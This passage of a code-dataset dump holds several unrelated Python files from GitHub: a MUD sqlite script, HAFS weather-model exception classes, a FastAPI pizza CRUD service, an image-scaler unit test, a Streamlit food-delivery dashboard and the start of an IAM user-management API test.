hall.\\\n The walls are mirrored and at the far end is a large sliding glass door.\"\"\")\n\natrium.addNeighbor(mainhall, \"south\")\n\nmainhall.addNeighbor(atrium, \"north\")\n\n\nprint(\"loading rooms\")\n\ntry:\n db.load_room(mainhall)\n db.load_room(atrium)\nexcept sqlite3.IntegrityError as e:\n print(\"Room's already loaded\")\n\nprint(\"rooms loaded\")\n\ndb.commit()\n\ndb.retrieve_room((\"atrium\"))\n\n","repo_name":"ekapla04/mud","sub_path":"sqlpractice.py","file_name":"sqlpractice.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38823334521","text":"#! /usr/bin/env python3\n\n\"\"\"!Exceptions raised by the hafs package\n\nThis module contains exceptions raised by the hafs package.\"\"\"\n\nclass HAFSError(Exception):\n \"\"\"!Base class of all exceptions in this module.\n\n This is the base class of exceptions raised by the HAFS module\n due to HAFS-specific failures. It is possible to get other\n exceptions from the StandardException hierarchy in certain failure\n cases. For example, trying to obtain the fifth of three domains\n may raise KeyError. Also, see pom.exceptions for exceptions that\n may be raised from the pom package. See the produtil package for\n exceptions that may come from lower levels.\"\"\"\n\n########################################################################\n# CONFIGURATION EXCEPTIONS\n\nclass DuplicateTaskName(HAFSError):\n \"\"\"!Raised when more than one task is registered with the same\n name in an HAFSConfig object.\"\"\"\n\nclass InvalidConfigOptName(HAFSError):\n \"\"\"!Raised when one tries to use an invalid string for an option\n name.\"\"\"\n\n########################################################################\n# FAILURE TESTING\n\nclass FailureTestException(HAFSError):\n \"\"\"!Raised to simulate a failure condition in the HAFS system.\"\"\"\n\nclass ExpectedFailureTest(FailureTestException):\n \"\"\"!Raised to simulate a failure condition in the HAFS system that\n should be caught, and trigger automated fallbacks.\"\"\"\n\nclass UnexpectedFailureTest(FailureTestException):\n \"\"\"!Raised to simulate a failure condition in the HAFS system that\n should never happen, and should result in an immediate abort of\n the workflow, even if automated fallbacks are enabled. \"\"\"\n\n########################################################################\n# ARCHIVING EXCEPTIONS\n\n\n########################################################################\n# NAMELIST-RELATED EXCEPTIONS\n\nclass NamelistValueError(ValueError):\n \"\"\"!Raised when hafs.namelist cannot convert a value to or from\n Fortran namelist format.\"\"\"\nclass NamelistKeyError(KeyError):\n \"\"\"!Raised when an hafs.namelist is asked for a key that does not\n exist.\"\"\"\n ##@var section\n # the section that was searched\n\n ##@var var\n # the option that was requested\n\n ##@var message\n # the exception message\n\n def __init__(self,message,section,var):\n \"\"\"!Constructor.\n @param message the string message\n @param section the section that was searched\n @param var the option that was requested\"\"\"\n super(NamelistKeyError,self).__init__(message)\n self.section=section\n self.var=var\n self.message=message\n def __str__(self):\n \"\"\"!Generates a string description of this exception.\"\"\"\n if self.section=='-trait-':\n return 'trait %s: %s' % (self.var,self.message)\n else:\n return '&%s %s: %s' % (self.section,self.var,self.message)\n def __repr__(self):\n \"\"\"!Generates a string representation of this object.\"\"\"\n return 'NamelistError(%s,%s,%s)' % \\\n ( repr(self.message), repr(self.section), repr(self.var) )\n\n########################################################################\n# SANITY CHECKER EXCEPTIONS\n\nclass HAFSSanityError(HAFSError):\n \"\"\"!Base class of all sanity checker exceptions.\"\"\"\nclass HAFSDirInsane(HAFSSanityError):\n \"\"\"!Raised when a directory is unspecified, missing or invalid.\"\"\"\n ##@var dir\n # The directory in question.\n\n def __init__(self,message,dir):\n \"\"\"!HAFSDirInsane constructor.\n @param message a string explanation of the problem\n @param dir the directory in question\"\"\"\n super(HAFSDirInsane,self).__init__(message)\n self.dir=dir\nclass HAFSConfigInsane(HAFSSanityError):\n \"\"\"!Raised when the requested configuration conf or hafs_expt files\n fail a sanity check.\"\"\"\nclass HAFSConfigUnsupported(HAFSConfigInsane):\n \"\"\"!Raised when the user requests a configuration that makes sense,\n but is not supported.\"\"\"\nclass HAFSConfigFileOrder(HAFSConfigInsane):\n \"\"\"!Raised when configuration files were specified in the wrong order.\"\"\"\nclass HAFSStormInsane(HAFSSanityError):\n \"\"\"!Raised when the configuration had a different storm than expected.\"\"\"\nclass HAFSCycleInsane(HAFSSanityError):\n \"\"\"!Raised when the configuration had a different cycle than expected.\"\"\"\nclass HAFSVariableInsane(HAFSSanityError):\n \"\"\"!Raised when a sanity check on a variable's value failed.\"\"\"\nclass HAFSInputInsane(HAFSSanityError):\n \"\"\"!Raised when input files to HAFS fail a sanity check.\"\"\"\nclass HAFSScriptInsane(HAFSSanityError):\n \"\"\"!Raised when HAFS scripts fail a sanity check.\"\"\"\nclass HAFSExecutableInsane(HAFSSanityError):\n \"\"\"!Raised when the HAFS executables fail a sanity check.\"\"\"\nclass HAFSFixInsane(HAFSSanityError):\n \"\"\"!Raised when the HAFS fix files fail a sanity check.\"\"\"\nclass HAFSArchiveInsane(HAFSSanityError):\n \"\"\"!Raised when the sanity check of the HAFS archiving settings\n fails.\"\"\"\nclass HAFSDataModelInsane(HAFSSanityError):\n \"\"\"!Raised when the sanity check of the HAFS data model settings\n fails.\"\"\"\n\n########################################################################\n# OCEAN AND WAVE EXCEPTIONS\n\n#NOTE: See pom.exceptions for more\nclass OceanInitFailed(HAFSError):\n \"\"\"!Raised when the ocean init did not produce some expected outputs.\"\"\"\nclass NoOceanData(HAFSError):\n \"\"\"!Raised when the parent global ocean model data was unavailable.\"\"\"\nclass OceanExeUnspecified(OceanInitFailed):\n \"\"\"!Raised when the HyCOM init foregets to choose an executable for\n the forecast job.\"\"\"\nclass InvalidOceanInitMethod(OceanInitFailed):\n \"\"\"!Raised when an invalid ocean initialization method is requested.\"\"\"\nclass OceanRestartMissing(OceanInitFailed):\n \"\"\"!Raised when the ocean restart file is missing.\"\"\"\nclass NoOceanBasin(OceanInitFailed):\n \"\"\"!Raised when there is no ocean basin for the selected domain center.\"\"\"\nclass OceanDataInvalid(OceanInitFailed):\n \"\"\"!Raised when an ocean input file contains invalid data.\"\"\"\n\nclass WaveInitFailed(HAFSError):\n \"\"\"!Raised when the wave initialization failes.\"\"\"\nclass WW3InputError(WaveInitFailed):\n \"\"\"!Raised when the wavewatch 3 cannot find necessary input.\"\"\"\n\n########################################################################\n# COUPLING EXCEPTIONS\n\nclass HAFSCouplingError(HAFSError):\n \"\"\"!Superclass of atmosphere-ocean-wave-otherthings coupling\n exceptions.\"\"\"\nclass NoCoupledComponents(HAFSCouplingError):\n \"\"\"!Raised when one requests a coupled forecast without specifying\n what is being coupled.\"\"\"\nclass EmptyCouplerNamelist(HAFSCouplingError):\n \"\"\"!Raised when the NCEP Coupler is to be used for coupling but its\n namelist file is empty or missing.\"\"\"\n\n########################################################################\n# GSI EXCEPTIONS\n\nclass GSIInputError(HAFSError):\n \"\"\"!Raised when GSI cannot find a required input file.\"\"\"\nclass ExpectedTDR(HAFSError):\n \"\"\"!Used in failure testing to abort the system if TDR was not present.\"\"\"\n\n########################################################################\n# TRACKER EXCEPTIONS\n\nclass TrackerError(HAFSError):\n \"\"\"!Base class of hafs.tracker exceptions.\"\"\"\nclass TrackerModeError(TrackerError):\n \"\"\"!Raised when an impossible tracker configuration is requested,\n such as running with a grid that is both regional and global.\"\"\"\nclass TrackerStormError(TrackerError):\n \"\"\"!Raised when multiple storms are requested, but only one was\n expected.\"\"\"\nclass TrackerInputError(TrackerError):\n \"\"\"!Base class of exceptions raised when the tracker's input files\n are missing or invalid.\"\"\"\nclass MissingGRIBError(TrackerInputError):\n \"\"\"!Not currently used, this would be raised when GRIB inputs to\n the tracker are missing.\"\"\"\nclass GRIBLocationError(TrackerInputError):\n \"\"\"!Raised when no location is specified for a tracker input GRIB\n file.\"\"\"\n\n########################################################################\n# TIME-RELATED EXCEPTIONS (used by many modules)\n\nclass HAFSTimeError(HAFSError):\n \"\"\"!Base class used for time-related HAFS exceptions.\"\"\"\n\n# Time and timestep exceptions:\nclass InvalidTimestep(HAFSTimeError):\n \"\"\"!Raised when a timestep is invalid, such as a negative timestep\n for a situation that requires a positive one.\"\"\"\nclass TimestepModularityError(HAFSTimeError):\n \"\"\"!Called when one hour is not divisable by the WRF output\n timestep.\"\"\"\nclass OverspecifiedOutputTime(HAFSTimeError):\n \"\"\"!Raised when an output time is specified in two redundant ways.\n\n For example, one could specify a forecast time directly, and also\n specify the analysis time and forecast time delta.\"\"\"\nclass NoOutputTime(HAFSTimeError):\n \"\"\"!Raised when a time was required, but none was provided.\"\"\"\nclass TimezoneProvided(HAFSTimeError):\n \"\"\"!Raised when a timezone is provided. The hafs package does not\n support timezones: all times are in UTC.\"\"\"\nclass PrecisionTooHigh(HAFSTimeError):\n \"\"\"!Raised when a time was requested with higher precision than available.\n\n Raised when a time was provided that contained fractions of a\n second, for a function that cannot handle that. For example, the\n WRF output files must be exactly on a second boundary.\"\"\"\nclass NotInTimespan(HAFSTimeError):\n \"\"\"!Raised when a time is outside the range of times being\n processed by a function.\"\"\"\nclass NoNearbyValues(HAFSTimeError):\n \"\"\"!Raised when an operation has a set of known times, but another\n provided time is not near one of those known times.\"\"\"\n\nclass InvalidTimespan(HAFSTimeError):\n \"\"\"!Superclass of exceptions relating to groups of one or more\n distinct times and relationships between them.\"\"\"\n ##@var start\n # the start of the problematic timespan\n\n ##@var end\n # the end of the problematic timespan\n\n def __init__(self,message,start,end):\n \"\"\"! Constructor for InvalidTimespan\n\n @param message the string explanation of the problem\n @param start the start of the timespan\n @param end the end of the timespan\"\"\"\n super(InvalidTimespan,self).__init__(message)\n self.start=start\n self.end=end\nclass EndBeforeStart(InvalidTimespan):\n \"\"\"!Raised when the end of a timespan is before the beginning.\"\"\"\nclass EndNotTimestep(InvalidTimespan):\n \"\"\"!Raised when the end of a timespan is not a timestep.\n Presently unused.\n\n Presently unused, this was to indicate that the end of a timespan\n is not on a timestep, for temporally discrete processes. Such end\n times are allowed in WRF, so this exception is unused.\"\"\"\nclass StartNotAtParentTimestep(InvalidTimespan):\n \"\"\"!Raised when a timespan's beginning is not at a timestep.\"\"\"\nclass TimestepTooLong(InvalidTimespan):\n \"\"\"!Raised when a timestep is too long for the process under\n consideration.\"\"\"\nclass TimestepTooShort(InvalidTimespan):\n \"\"\"!Raised when a timestep is too short for the process under\n consideration.\"\"\"\nclass NoTimespan(InvalidTimespan):\n \"\"\"!Raised when a timespan was expected, but none was available.\"\"\"\n\n########################################################################\n# REGRIB-RELATED EXCEPTIONS (mostly hafs.regrib and hafs.gribtask)\n\nclass RegribError(HAFSError):\n \"\"\"!Superclass of errors used by Regrib.\"\"\"\nclass GRIBInputError(RegribError):\n \"\"\"!Raised when a GRIB file is invalid.\n\n Raised when a GRIB file is provided, but that file is invalid.\n This can be due to either an input to an operation, or the output\n from the operation.\"\"\"\nclass Subsetless(RegribError):\n \"\"\"!Raised when a Regrib was expecting a GRIB subsetter function,\n but no such function was provided.\"\"\"\n\nclass InvalidRegribResult(RegribError):\n \"\"\"!Debug assetion in hafs.regrib used to detect type mismatches.\n\n Part of debug assertions in hafs.regrib, this is raised when the\n wrong type is generated by the \"make\" function.\"\"\"\n\nclass RegribProductError(RegribError):\n \"\"\"!Superclass of errors relating to regrib products.\"\"\"\nclass NoProductError(RegribProductError):\n \"\"\"!Raised when an operation that produces input to Regrib should\n have produced a Product, but produced nothing at all.\"\"\"\nclass ProductAmbiguityError(RegribProductError):\n \"\"\"!Raised when an operation that provides input to Regrib produces\n more than one product.\"\"\"\nclass NoIndexError(RegribError):\n \"\"\"!Raised when a GRIB file should have an index file already, but\n doesn't.\"\"\"\n\nclass RegribManyError(RegribError):\n \"\"\"!Base class of errors from the hafs.regrib.RegribMany\"\"\"\nclass RegribKeyError(RegribManyError):\n \"\"\"!Raised when a RegribMany is given an invalid name: one that\n does not match a known grid or operation.\"\"\"\n\nclass RegribGridError(RegribError):\n \"\"\"!Base class of grid-related regrib errors.\"\"\"\nclass GridlessError(RegribGridError):\n \"\"\"!Raised when a grid was expected but none was provided.\"\"\"\nclass GridMismatchError(RegribGridError):\n \"\"\"!Raised when two GRIB files have non-matching grids, but a\n matching grid is required.\"\"\"\n\nclass GribberError(RegribError):\n \"\"\"!Exceptions for hafs.regrib.GRIBTask for certain internal errors.\n\n Raised by GRIBTask for unexpected errors that did not come from\n the underlying RegribAll object. This is used in GRIBTask.run's\n \"run it now\" mode, when setting raiseall=True.\"\"\"\n\n########################################################################\n# INPUT EXCEPTIONS\n\nclass HAFSInputError(HAFSError):\n \"\"\"!Base class of exceptions related to the hafs.input module.\"\"\"\nclass InputSourceBadType(HAFSInputError):\n \"\"\"!Raised when a configuration file requests a DataCatalog class\n that does not exist.\"\"\"\nclass InvalidInputSpecification(HAFSInputError):\n \"\"\"!Raised when an input source is missing the location, or both\n histprio and fcstprio.\"\"\"\nclass PartialTransfer(HAFSInputError):\n \"\"\"!Raised when a file transfer, done by an InputSource, was\n incomplete.\"\"\"\nclass UnsupportedTransfer(HAFSInputError):\n \"\"\"!Raised when a configuration file requests an unsupported data\n transfer method (such as carrier pigeon).\"\"\"\n\n########################################################################\n# Post exceptions\n\nclass PostFailed(HAFSError):\n \"\"\"!Raised upon errors that would cause a retry, in the\n PostOneWRF.run when passed the raiseall=True argument.\"\"\"\n\nclass PostHasNoInput(HAFSError):\n \"\"\"!Raised when the post's input file is not available and\n raiseall=True in PostOneWRF.run\"\"\"\n\n########################################################################\n# Relocation exceptions\n\nclass RelocationError(HAFSError):\n \"\"\"!Raised when something in the vortex relocation fails.\"\"\"\nclass RelocationInputError(RelocationError):\n \"\"\"!Raised when required inputs to the relocation are missing.\"\"\"\nclass RelocationConfigurationError(RelocationError):\n \"\"\"!Raised when an impossible configuration is requested.\"\"\"\nclass RelocateOutputMissing(RelocationError):\n \"\"\"!Raised when a relocation program did not produce an expected\n output file.\"\"\"\nclass UnexpectedColdStart(RelocationError):\n \"\"\"!Raised when the relocation could not find the prior cycle's 6hr\n forecast, but it expected to be able to.\"\"\"\nclass StormRadiusError(RelocationError):\n \"\"\"!Raised when the merge cannot find the storm_radius file in the\n relocate or fix directory.\"\"\"\nclass NoSuchDomain(RelocationError):\n \"\"\"!Raised by hafs.input when trying to get the wrong domain from\n its hafs.relocate.Relocate child objects.\"\"\"\nclass EnsdaTrackerMissing(RelocationError):\n \"\"\"Raised when the relocation could not find the prior cycle's\n ensemble forecast track, but it expected to be able to.\"\"\"\n","repo_name":"hafs-community/HAFS","sub_path":"ush/hafs/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":15839,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"18170251575","text":"from datetime import datetime\nfrom fastapi import status\n\nfrom src.core.interfaces.services.pizzas.interface import IPizzaService\nfrom src.domain.models.responses.base.model import BaseResponse\nfrom src.domain.models.responses.orders.model import OrdersResponse\nfrom src.repositories.pizzas.repository import PizzasRepository\n\n\nclass PizzaService(IPizzaService):\n @classmethod\n async def create_pizza(cls, payload: dict, pizza_repo=PizzasRepository):\n data = payload.get(\"payload\")\n pizza_name = data.get(\"name\")\n query = {\"name\": pizza_name}\n projection = {\"_id\": False}\n\n price = data.get(\"price\")\n if price <= 0:\n return {\n \"status_code\": status.HTTP_400_BAD_REQUEST,\n \"message\": f\"Price invalid: {price}. Price must be greater than zero\",\n }\n\n pizza_data = await pizza_repo.find_one(query, projection)\n\n if pizza_data:\n return {\n \"status_code\": status.HTTP_200_OK,\n \"message\": \"Pizza already exist!. Try another pizza\",\n }\n\n data.update({\"created_at\": datetime.now().isoformat()})\n await pizza_repo.insert_one(data)\n return {\"status_code\": status.HTTP_201_CREATED, \"message\": \"Pizza created!\"}\n\n @classmethod\n async def find_all_pizzas(cls, payload: dict, pizza_repo=PizzasRepository):\n projection = {\"_id\": False}\n limit = int(payload.get(\"size\"))\n page = int(payload.get(\"page\"))\n\n skip = pizza_repo.calculate_skip(limit, page)\n\n result, total_items = await pizza_repo.find_all_paginated(\n {}, skip, limit, projection\n )\n total_pages = pizza_repo.calculate_pages(total_items, limit)\n\n response = OrdersResponse(\n result=result,\n total_pages=total_pages,\n status_code=status.HTTP_302_FOUND,\n message=\"\",\n ).__dict__\n return response\n\n @classmethod\n async def find_one_pizza(cls, payload: dict, pizza_repo=PizzasRepository):\n projection = {\"_id\": False}\n pizza_name = payload.get(\"pizza_name\")\n query = {\"name\": {\"$regex\": pizza_name, \"$options\": \"i\"}}\n\n result = await pizza_repo.find_one(query, projection)\n if not result:\n return BaseResponse(\n result=[],\n status_code=status.HTTP_404_NOT_FOUND,\n message=\"Pizza not found\",\n ).__dict__\n\n response = BaseResponse(\n result=result, status_code=status.HTTP_302_FOUND, message=\"Pizza Found\"\n ).__dict__\n return response\n\n @classmethod\n async def update_pizza(cls, payload: dict, pizza_repo=PizzasRepository):\n pizza_name = payload.get(\"pizza_name\")\n query = {\"name\": pizza_name}\n projection = {\"_id\": False}\n new_data = payload.get(\"data\")\n new_data.update({\"updated_at\": datetime.now().isoformat()})\n\n price = new_data.get(\"price\")\n if price <= 0:\n return {\n \"status_code\": status.HTTP_400_BAD_REQUEST,\n \"message\": f\"Price invalid: {price}. Price must be greater than zero\",\n }\n\n result = await pizza_repo.find_one(query, projection)\n if not result:\n return BaseResponse(\n result=[],\n status_code=status.HTTP_404_NOT_FOUND,\n message=\"Pizza not found\",\n ).__dict__\n\n await pizza_repo.update_one(query, new_data)\n response = BaseResponse(\n result=[], status_code=status.HTTP_200_OK, message=\"Pizza updated\"\n ).__dict__\n return response\n\n @classmethod\n async def delete_pizza(cls, payload: dict, pizza_repo=PizzasRepository):\n pizza_name = payload.get(\"pizza_name\")\n query = {\"name\": pizza_name}\n projection = {\"_id\": False}\n\n result = await pizza_repo.find_one(query, projection)\n if not result:\n return BaseResponse(\n result=[],\n status_code=status.HTTP_404_NOT_FOUND,\n message=\"Pizza not found\",\n ).__dict__\n\n await pizza_repo.delete_one(query)\n response = BaseResponse(\n result=[], status_code=status.HTTP_200_OK, message=\"Pizza updated\"\n ).__dict__\n return response\n","repo_name":"SMarkus27/pizzas-api-python","sub_path":"src/services/pizzas/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72811285228","text":"import numpy as np\n\nfrom src.services.dto.bounding_box import BoundingBoxDTO\nfrom src.services.facescan.imgscaler.imgscaler import ImgScaler\n\n\ndef test__given_downscaled_image__when_upscaling_box__then_returns_upscaled_box():\n img = np.zeros((200, 200, 3))\n scaler = ImgScaler(img_length_limit=100)\n scaler.downscale_img(img)\n\n output_box = BoundingBoxDTO(10, 10, 20, 20, 1).scaled(scaler.upscale_coefficient)\n\n assert output_box == BoundingBoxDTO(20, 20, 40, 40, 1)\n\n\ndef test__given_not_downscaled_image__when_upscaling_box__then_returns_same_box():\n img = np.zeros((20, 20, 3))\n scaler = ImgScaler(img_length_limit=100)\n scaler.downscale_img(img)\n\n output_box = BoundingBoxDTO(10, 10, 20, 20, 1).scaled(scaler.upscale_coefficient)\n\n assert output_box == BoundingBoxDTO(10, 10, 20, 20, 1)\n","repo_name":"exadel-inc/CompreFace","sub_path":"embedding-calculator/src/services/facescan/imgscaler/test/test_upscale_box.py","file_name":"test_upscale_box.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":3424,"dataset":"github-code","pt":"37"} +{"seq_id":"38851060258","text":"import pandas as pd\r\nimport numpy as np\r\nimport statistics\r\nimport plotly.express as px\r\nfrom haversine import haversine\r\nimport streamlit as st\r\nfrom PIL import Image\r\nimport folium\r\nfrom streamlit_folium import folium_static\r\nimport datetime\r\nimport plotly.graph_objects as go\r\n\r\nst.set_page_config( page_title='Visão Restaurantes', page_icon='🍽️', layout='wide' )\r\n\r\ndf_raw = pd.read_csv('train.csv')\r\ndf = df_raw.copy()\r\n\r\n# Remover spaco da string\r\ndf['ID'] = df['ID'].str.strip()\r\ndf['Delivery_person_ID'] = df['Delivery_person_ID'].str.strip()\r\n\r\n# Excluir as linhas com a idade dos entregadores vazia\r\n# ( Conceitos de seleção condicional )\r\nlinhas_vazias = df['Delivery_person_Age'] != 'NaN '\r\ndf = df.loc[linhas_vazias, :]\r\n\r\n# Conversao de texto/categoria/string para numeros inteiros\r\ndf['Delivery_person_Age'] = df['Delivery_person_Age'].astype( int )\r\n\r\n# Conversao de texto/categoria/strings para numeros decimais\r\ndf['Delivery_person_Ratings'] = df['Delivery_person_Ratings'].astype( float )\r\n\r\n# Conversao de texto para data\r\ndf['Order_Date'] = pd.to_datetime( df['Order_Date'], format='%d-%m-%Y' )\r\n\r\n# Remove as linhas da culuna multiple_deliveries que tenham o \r\n# conteudo igual a 'NaN '\r\nlinhas_vazias = df['multiple_deliveries'] != 'NaN '\r\ndf = df.loc[linhas_vazias, :]\r\ndf['multiple_deliveries'] = df['multiple_deliveries'].astype( int )\r\n\r\n# Comando para remover o texto de números\r\ndf = df.reset_index( drop=True )\r\n\r\n# 6. Removendo os espacos dentro de strings/texto/object\r\n\r\ndf.loc[:, 'ID'] = df.loc[:, 'ID'].str.strip()\r\ndf.loc[:, 'Road_traffic_density'] = df.loc[:, 'Road_traffic_density'].str.strip()\r\ndf.loc[:, 'Type_of_order'] = df.loc[:, 'Type_of_order'].str.strip()\r\ndf.loc[:, 'Type_of_vehicle'] = df.loc[:, 'Type_of_vehicle'].str.strip()\r\ndf.loc[:, 'City'] = df.loc[:, 'City'].str.strip()\r\ndf.loc[:, 'Festival'] = df.loc[:, 'Festival'].str.strip()\r\n\r\n\r\n#Retirando os numeros da coluna Time_taken(min)\r\ndf['Time_taken(min)'] = df['Time_taken(min)'].apply(lambda x: x.split( '(min) ')[1])\r\ndf['Time_taken(min)'] = df['Time_taken(min)'].str.replace('(', '').str.replace(')', '')\r\ndf['Time_taken(min)'] = df['Time_taken(min)'].astype( int )\r\n\r\n\r\n# Retirando os espaços da coluna Festival\r\ndf['Festival'] = df['Festival'].str.strip()\r\n\r\npedidos_dia = df.loc[:,['ID','Order_Date']].groupby( 'Order_Date' ).count().reset_index()\r\npx.bar( pedidos_dia, x = 'Order_Date', y = 'ID')\r\nprint('estouaqui')\r\n#=====================\r\n#streamlit\r\nst.header('Marketplace Visão Restaurantes')\r\n\r\n\r\n#=====================\r\n#Barra lateral\r\n#=====================\r\n\r\nimage = Image.open('logo.jpg')\r\nst.sidebar.image(image,width=40)\r\nst.sidebar.markdown('# Curry Company')\r\nst.sidebar.markdown('## Best delivery in Town')\r\n\r\nst.sidebar.markdown(' ## Selecione uma data para visualizar')\r\ndate_slider = st.sidebar.slider('Até qual valor?',\r\n value = datetime.datetime(2022, 3, 13),\r\n min_value = datetime.datetime(2022, 2, 11 ),\r\n max_value = datetime.datetime(2022, 4, 6),\r\n format = 'DD-MM-YYYY')\r\nst.header(date_slider)\r\nst.sidebar.markdown('''---''')\r\ntraffic_options = st.sidebar.multiselect(\r\n 'Quais as condições de trânsito?',\r\n ('Baixo', 'Médio','Alto','Congestionamento'))\r\nst.sidebar.markdown('''---''')\r\n\r\n\r\n#=====================\r\n# Layout\r\n#=====================\r\n\r\ntab1, tab2, tab3 = st.tabs(['Visão Cliente', 'Visão Gerencial', 'Visão Geográfica'])\r\n\r\nwith tab1:\r\n \r\n with st.container():\r\n st.markdown('## Metrics')\r\n col1, col2 = st.columns (2)\r\n with col1:\r\n aux = df.loc[0:10, ['Restaurant_latitude', 'Restaurant_longitude','Delivery_location_latitude', 'Delivery_location_longitude']].apply(lambda x: haversine((x['Restaurant_latitude'], x['Restaurant_longitude']), (x['Delivery_location_latitude'], x['Delivery_location_longitude'])),axis = 1)\r\n aux = round(aux.mean(), 2)\r\n col1.metric('Distância média',aux)\r\n \r\n \r\n entregadores = df['Delivery_person_ID'].nunique()\r\n col1.metric('Entregadores ',entregadores)\r\n \r\n with col2:\r\n aux = round(df.loc[df['Festival'] =='No','Time_taken(min)'].mean(), 2)\r\n col2.metric('Média de tempo sem Festival',aux)\r\n \r\n aux2 = round(df.loc[df['Festival'] =='Yes','Time_taken(min)'].mean(), 2)\r\n col2.metric('Média de tempo com Festival',aux2)\r\n \r\n \r\n with st.container():\r\n st.markdown('## Time Taken Mean') \r\n aux = df.groupby('City').agg({'Time_taken(min)': ['mean', 'std']}).reset_index()\r\n aux.columns = ['City', 'Mean', 'Std']\r\n fig = px.pie(aux, values='Mean', names='City')\r\n st.plotly_chart(fig, use_container_width=True)\r\n \r\nwith st.container():\r\n st.markdown( \"\"\"---\"\"\" )\r\n st.title( \"Distribuição do Tempo\" )\r\n \r\n df_aux = df.loc[:, ['City', 'Time_taken(min)']].groupby( 'City' ).agg( {'Time_taken(min)': ['mean', 'std']} )\r\n df_aux.columns = ['avg_time', 'std_time']\r\n df_aux = df_aux.reset_index()\r\n\r\n fig = go.Figure() \r\n fig.add_trace( go.Bar( name='Control', x=df_aux['City'], y=df_aux['avg_time'], error_y=dict(type='data', array=df_aux['std_time']))) \r\n fig.update_layout(barmode='group') \r\n\r\n st.plotly_chart( fig )\r\n \r\n \r\n\r\n \r\nwith st.container():\r\n st.markdown( \"\"\"---\"\"\" )\r\n \r\n \r\n #col1, col_extra, col2 = st.columns( 3, gap =\"large\" )\r\n with col1:\r\n cols = ['Delivery_location_latitude', 'Delivery_location_longitude', 'Restaurant_latitude', 'Restaurant_longitude']\r\n df['distance'] = df.loc[:, cols].apply( lambda x: \r\n haversine( (x['Restaurant_latitude'], x['Restaurant_longitude']), \r\n (x['Delivery_location_latitude'], x['Delivery_location_longitude']) ), axis=1 )\r\n\r\n avg_distance = df.loc[:, ['City', 'distance']].groupby( 'City' ).mean().reset_index()\r\n fig = go.Figure( data=[ go.Pie( labels=avg_distance['City'], values=avg_distance['distance'], pull=[0, 0.1, 0])])\r\n st.plotly_chart( fig )\r\n\r\n \r\n with col2:\r\n df_aux = ( df.loc[:, ['City', 'Time_taken(min)', 'Road_traffic_density']]\r\n .groupby( ['City', 'Road_traffic_density'] )\r\n .agg( {'Time_taken(min)': ['mean', 'std']} ) )\r\n\r\n df_aux.columns = ['avg_time', 'std_time']\r\n df_aux = df_aux.reset_index()\r\n\r\n fig = px.sunburst(df_aux, path=['City', 'Road_traffic_density'], values='avg_time',\r\n color='std_time', color_continuous_scale='RdBu',\r\n color_continuous_midpoint=np.average(df_aux['std_time'] ) )\r\n st.plotly_chart( fig )\r\n \r\n \r\n","repo_name":"karolmetzker/curry_company","sub_path":"pages/visao_restaurante.py","file_name":"visao_restaurante.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27882450851","text":"import traceback\n\nfrom flask import jsonify\n\nfrom dataactcore.config import CONFIG_SERVICES\n\n\ndef add_exception_handlers(app):\n @app.errorhandler(422)\n def handle_invalid_usage(error):\n \"\"\"We receive 422s from the webargs library. Clean up their message\n and convert them to 400s\"\"\"\n if hasattr(error, 'data'):\n message = ' '.join(\n field_name + ': ' + '; '.join(messages)\n for field_name, messages\n in sorted(error.data['messages'].items())\n )\n else:\n message = 'Invalid request'\n body = {'message': message}\n if CONFIG_SERVICES['debug']:\n body['exception_type'] = str(error.exc)\n body['trace'] = [\n str(entry)\n for entry in traceback.extract_tb(error.exc.__traceback__, 10)\n ]\n return jsonify({'message': message}), 400\n","repo_name":"fedspendingtransparency/data-act-broker-backend","sub_path":"dataactbroker/exception_handler.py","file_name":"exception_handler.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"7065328927","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport requests\nimport hashlib\nfrom WsTestCase import WsTestCase\n\n\nclass IamTestCase(WsTestCase):\n ref_user = {\n 'login': 'john.doe',\n 'password_hash': '1234',\n 'last_name': 'Doe',\n 'first_name': 'John',\n 'role': 'user',\n 'entity_id': 'bab2ab808f1a11e3baa80800200c9a66'\n }\n\n def test_create_user_twice(self):\n \"\"\"Try to create the same user twice, the first works and we assert failure on the second trial.\"\"\"\n rv_post = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_post, 201)\n json_post = rv_post.json()\n\n # check returned user's fields\n for field in ('login', 'last_name', 'first_name', 'role', 'entity_id'):\n self.assertIn(field, json_post, 'missing field ' + field)\n self.assertEquals(json_post[field], self.ref_user[field], 'mismatch on field ' + field)\n\n user_id = json_post['id']\n\n rv_get = self.get(self.iam_endpoint + '/v1/users/' + user_id)\n self.assertJsonAndStatus(rv_get, 200)\n\n rv_post_2 = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_post_2, 412)\n\n def test_edit_user(self):\n \"\"\"Create and modify a user.\"\"\"\n rv_post = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n user_id = rv_post.json()['id']\n\n put_data = {\n 'login': 'jack.foo',\n 'last_name': 'Foo',\n 'first_name': 'Jack',\n 'role': 'manager'\n }\n\n # Edit the user\n rv_put = self.put_json(self.iam_endpoint + '/v1/users/' + user_id,\n put_data,\n self.session)\n self.assertJsonAndStatus(rv_put, 200)\n json_put = rv_put.json()\n\n # Get it\n rv_get = self.get(self.iam_endpoint + '/v1/users/' + user_id)\n self.assertJsonAndStatus(rv_get, 200)\n json_get = rv_get.json()\n\n # Assert the concerned fields are modified in both the PUT and GET responses\n for field in ('login', 'last_name', 'first_name', 'role'):\n self.assertIn(field, json_put, 'missing field ' + field + ' in PUT response')\n self.assertIn(field, json_get, 'missing field ' + field + ' in GET response')\n self.assertEquals(json_put[field], put_data[field],\n 'mismatch on field ' + field + ' in PUT response')\n 